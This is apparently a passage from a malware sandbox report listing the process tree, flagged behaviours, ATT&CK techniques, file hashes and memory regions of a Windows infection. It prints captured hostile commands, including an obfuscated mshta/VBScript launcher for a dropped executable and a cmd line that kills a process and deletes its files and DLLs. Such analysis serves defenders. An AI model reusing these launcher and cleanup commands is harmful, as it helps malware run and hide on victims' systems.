C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT("wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul ",0) )2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" =="" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\D4E0.exe"C:\Users\Admin\AppData\Local\Temp\D4E0.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\DB5A.exe"C:\Users\Admin\AppData\Local\Temp\DB5A.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"C:\Users\Admin\AppData\Local\Temp\E0C9.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\EE38.exe"C:\Users\Admin\AppData\Local\Temp\EE38.exe"1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wmsetup.log1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4160 -s 12042⤵
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5568 -s 16882⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\CA9E.exe"C:\Users\Admin\AppData\Local\Temp\CA9E.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\C0AA.exe"C:\Users\Admin\AppData\Local\Temp\C0AA.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\1371397063.exe"C:\Users\Admin\AppData\Local\Temp\1371397063.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\C454.exe"C:\Users\Admin\AppData\Local\Temp\C454.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\FF51.exe"C:\Users\Admin\AppData\Local\Temp\FF51.exe"1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\4a63f199e6924531950738d7562104ae /t 5364 /p 4081⤵
-
C:\Users\Admin\AppData\Local\Temp\F86A.exe"C:\Users\Admin\AppData\Local\Temp\F86A.exe" C:\Users\Admin\AppData\Local\Temp\JavaDeployReg.log1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"C:\Users\Admin\AppData\Local\Temp\E0C9.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6976 -s 28922⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\18AC.exe"C:\Users\Admin\AppData\Local\Temp\18AC.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\21B5.exe"C:\Users\Admin\AppData\Local\Temp\21B5.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe"C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe" & del C:\ProgramData\*.dll & exit2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\ktetzzug.3kl\google-game.exe"C:\Users\Admin\AppData\Local\Temp\ktetzzug.3kl\google-game.exe"1⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6960 -s 12242⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Defense Evasion
Virtualization/Sandbox Evasion
1Modify Registry
4BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datMD5
c304cb13aabe1b257297afda703af1b8
SHA1d3e774717e52323ef559d5538914212f09258e88
SHA2565965406efddfec70ff6e189edec5b5544dc694e3f26be70a89810303a161a619
SHA512252fb1a974e42eebcf1ab29cf3cdbd37f66e6e60f5a5da471ec076c4226431a0409add5f96dd65837fa7fc6b1a7532874a1da18c5dd82398a1b9fdf93971cd7b
-
\??\pipe\crashpad_3680_YXGDYDQBCPKWFRVYMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\crashpad_5048_NQOSDZZEMEXJKSGXMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/68-249-0x000001F928680000-0x000001F9286F2000-memory.dmpFilesize
456KB
-
memory/184-243-0x0000000000000000-mapping.dmp
-
memory/188-122-0x0000000000000000-mapping.dmp
-
memory/404-126-0x0000000000000000-mapping.dmp
-
memory/576-288-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/684-276-0x000001AEBB140000-0x000001AEBB1B2000-memory.dmpFilesize
456KB
-
memory/744-204-0x0000000000000000-mapping.dmp
-
memory/804-116-0x0000000000000000-mapping.dmp
-
memory/904-251-0x0000000004FC0000-0x000000000501D000-memory.dmpFilesize
372KB
-
memory/904-245-0x0000000004EC0000-0x0000000004FC0000-memory.dmpFilesize
1024KB
-
memory/1080-256-0x000001FF31200000-0x000001FF31272000-memory.dmpFilesize
456KB
-
memory/1188-264-0x000001E98CE40000-0x000001E98CEB2000-memory.dmpFilesize
456KB
-
memory/1244-265-0x0000023801620000-0x0000023801692000-memory.dmpFilesize
456KB
-
memory/1288-293-0x0000000002D80000-0x0000000002D82000-memory.dmpFilesize
8KB
-
memory/1288-298-0x0000000002D84000-0x0000000002D85000-memory.dmpFilesize
4KB
-
memory/1288-295-0x0000000002D82000-0x0000000002D84000-memory.dmpFilesize
8KB
-
memory/1300-211-0x0000000000000000-mapping.dmp
-
memory/1368-258-0x000002668DB90000-0x000002668DC02000-memory.dmpFilesize
456KB
-
memory/1416-149-0x0000000000000000-mapping.dmp
-
memory/1508-232-0x0000000000000000-mapping.dmp
-
memory/1508-289-0x0000000002AD0000-0x0000000002AD2000-memory.dmpFilesize
8KB
-
memory/1580-247-0x0000000002B10000-0x0000000002CAC000-memory.dmpFilesize
1.6MB
-
memory/1788-261-0x00000230EEE40000-0x00000230EEEB2000-memory.dmpFilesize
456KB
-
memory/2096-290-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/2108-212-0x0000000000000000-mapping.dmp
-
memory/2152-208-0x0000000000000000-mapping.dmp
-
memory/2172-231-0x0000000000000000-mapping.dmp
-
memory/2208-306-0x0000000004850000-0x0000000004D4E000-memory.dmpFilesize
5.0MB
-
memory/2252-214-0x0000000000000000-mapping.dmp
-
memory/2272-239-0x0000000000000000-mapping.dmp
-
memory/2328-275-0x000001C9CFF80000-0x000001C9CFFF2000-memory.dmpFilesize
456KB
-
memory/2336-253-0x00000243EBC80000-0x00000243EBCF2000-memory.dmpFilesize
456KB
-
memory/2352-278-0x0000000005190000-0x0000000005191000-memory.dmpFilesize
4KB
-
memory/2380-132-0x0000000000000000-mapping.dmp
-
memory/2556-273-0x000001A736000000-0x000001A736072000-memory.dmpFilesize
456KB
-
memory/2640-268-0x0000015D8D500000-0x0000015D8D572000-memory.dmpFilesize
456KB
-
memory/2656-270-0x000001CB60280000-0x000001CB602F2000-memory.dmpFilesize
456KB
-
memory/2676-282-0x0000000004FE0000-0x0000000004FE1000-memory.dmpFilesize
4KB
-
memory/3300-308-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3328-246-0x000001E0DAE50000-0x000001E0DAE9B000-memory.dmpFilesize
300KB
-
memory/3328-259-0x000001E0DAF10000-0x000001E0DAF82000-memory.dmpFilesize
456KB
-
memory/3672-279-0x0000000004E70000-0x0000000004E71000-memory.dmpFilesize
4KB
-
memory/3716-213-0x0000000000000000-mapping.dmp
-
memory/3756-154-0x0000000000000000-mapping.dmp
-
memory/3784-250-0x000000001BA00000-0x000000001BA02000-memory.dmpFilesize
8KB
-
memory/3960-241-0x0000000000000000-mapping.dmp
-
memory/3968-140-0x0000000000000000-mapping.dmp
-
memory/3972-291-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/3996-121-0x0000000000000000-mapping.dmp
-
memory/3996-125-0x00007FF89A0D0000-0x00007FF89A0D1000-memory.dmpFilesize
4KB
-
memory/4000-145-0x0000000000000000-mapping.dmp
-
memory/4000-244-0x0000000000000000-mapping.dmp
-
memory/4012-162-0x0000000000000000-mapping.dmp
-
memory/4124-234-0x0000000000000000-mapping.dmp
-
memory/4124-205-0x0000000000000000-mapping.dmp
-
memory/4232-237-0x0000000000000000-mapping.dmp
-
memory/4276-283-0x0000000010000000-0x0000000010145000-memory.dmpFilesize
1.3MB
-
memory/4276-277-0x00000000050D0000-0x000000000520F000-memory.dmpFilesize
1.2MB
-
memory/4292-238-0x0000000000000000-mapping.dmp
-
memory/4300-296-0x0000000001052000-0x0000000001054000-memory.dmpFilesize
8KB
-
memory/4300-294-0x0000000001050000-0x0000000001052000-memory.dmpFilesize
8KB
-
memory/4300-297-0x0000000001054000-0x0000000001055000-memory.dmpFilesize
4KB
-
memory/4300-299-0x0000000001055000-0x0000000001057000-memory.dmpFilesize
8KB
-
memory/4308-206-0x0000000000000000-mapping.dmp
-
memory/4364-207-0x0000000000000000-mapping.dmp
-
memory/4396-177-0x0000000000000000-mapping.dmp
-
memory/4400-292-0x0000000001340000-0x0000000001342000-memory.dmpFilesize
8KB
-
memory/4408-209-0x0000000000000000-mapping.dmp
-
memory/4428-227-0x0000000000000000-mapping.dmp
-
memory/4468-303-0x0000000002C20000-0x0000000002CCE000-memory.dmpFilesize
696KB
-
memory/4472-287-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/4496-233-0x0000000000000000-mapping.dmp
-
memory/4516-272-0x000001EFF2E30000-0x000001EFF2EA2000-memory.dmpFilesize
456KB
-
memory/4540-218-0x0000000000000000-mapping.dmp
-
memory/4544-281-0x0000000000400000-0x0000000002BEA000-memory.dmpFilesize
39.9MB
-
memory/4544-280-0x0000000002CA0000-0x0000000002D4E000-memory.dmpFilesize
696KB
-
memory/4552-217-0x0000000000000000-mapping.dmp
-
memory/4580-181-0x0000000000000000-mapping.dmp
-
memory/4588-210-0x0000000000000000-mapping.dmp
-
memory/4608-226-0x0000000000000000-mapping.dmp
-
memory/4628-236-0x0000000000000000-mapping.dmp
-
memory/4688-216-0x0000000000000000-mapping.dmp
-
memory/4716-185-0x0000000000000000-mapping.dmp
-
memory/4716-228-0x0000000000000000-mapping.dmp
-
memory/4728-215-0x0000000000000000-mapping.dmp
-
memory/4760-240-0x0000000000000000-mapping.dmp
-
memory/4768-190-0x0000000000000000-mapping.dmp
-
memory/4780-235-0x0000000000000000-mapping.dmp
-
memory/4800-219-0x0000000000000000-mapping.dmp
-
memory/4820-225-0x0000000000000000-mapping.dmp
-
memory/4820-194-0x0000000000000000-mapping.dmp
-
memory/4832-300-0x00000000037A0000-0x00000000037E8000-memory.dmpFilesize
288KB
-
memory/4836-223-0x0000000000000000-mapping.dmp
-
memory/4856-195-0x0000000000000000-mapping.dmp
-
memory/4856-220-0x0000000000000000-mapping.dmp
-
memory/4864-229-0x0000000000000000-mapping.dmp
-
memory/4892-196-0x0000000000000000-mapping.dmp
-
memory/4904-222-0x0000000000000000-mapping.dmp
-
memory/4904-197-0x0000000000000000-mapping.dmp
-
memory/4956-221-0x0000000000000000-mapping.dmp
-
memory/4964-198-0x0000000000000000-mapping.dmp
-
memory/4976-199-0x0000000000000000-mapping.dmp
-
memory/5020-307-0x0000000000400000-0x000000000040A000-memory.dmpFilesize
40KB
-
memory/5028-224-0x0000000000000000-mapping.dmp
-
memory/5036-200-0x0000000000000000-mapping.dmp
-
memory/5036-242-0x0000000000000000-mapping.dmp
-
memory/5044-230-0x0000000000000000-mapping.dmp
-
memory/5048-201-0x0000000000000000-mapping.dmp
-
memory/5092-202-0x0000000000000000-mapping.dmp
-
memory/5100-284-0x0000026BDDF40000-0x0000026BDDF8B000-memory.dmpFilesize
300KB
-
memory/5100-286-0x0000026BE0800000-0x0000026BE0905000-memory.dmpFilesize
1.0MB
-
memory/5100-285-0x0000026BDE040000-0x0000026BDE0B2000-memory.dmpFilesize
456KB
-
memory/5460-301-0x0000000140000000-0x0000000140383000-memory.dmpFilesize
3.5MB
-
memory/5636-302-0x0000000140000000-0x000000014070A000-memory.dmpFilesize
7.0MB
-
memory/5636-305-0x000001BF67BA0000-0x000001BF67BC0000-memory.dmpFilesize
128KB
-
memory/5948-304-0x0000000000400000-0x0000000000447000-memory.dmpFilesize
284KB